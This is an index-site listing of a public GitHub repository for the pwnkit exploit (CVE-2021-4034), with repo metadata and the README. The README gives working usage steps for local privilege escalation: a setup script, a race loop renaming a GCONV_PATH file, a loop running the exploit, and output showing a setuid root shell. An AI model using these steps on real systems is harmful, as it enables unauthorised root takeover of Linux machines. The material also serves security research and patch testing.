Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Ayrx/CVE-2021-4034
Exploit for CVE-2021-4034
Last synced: 3 months ago
- Host: GitHub
- URL: https://github.com/Ayrx/CVE-2021-4034
- Owner: Ayrx
- Created: 2022-01-26T03:33:47.000Z (almost 3 years ago)
- Default Branch: master
- Last Pushed: 2022-01-27T11:57:05.000Z (almost 3 years ago)
- Last Synced: 2024-05-02T17:53:07.613Z (6 months ago)
- Language: C
- Homepage:
- Size: 3.91 KB
- Stars: 96
- Watchers: 6
- Forks: 14
- Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - Ayrx/CVE-2021-4034 - Exploit for CVE-2021-4034 (C)
README
# CVE-2021-4034
Exploit for the [pwnkit vulnerability](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)
from the Qualys team.

This exploit assumes that `gcc` is present on the target machine.
```
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
```

Run the following command in one bash session:
```
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
```

Run the following command in another bash session:
```
while :; do ./exploit; done
```

You will eventually win the race and obtain a `shell` binary that gives you
root access:

```
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
```

A short write up on the technique can be found on my [blog](https://www.ayrx.me/pwnkit-no-logs/).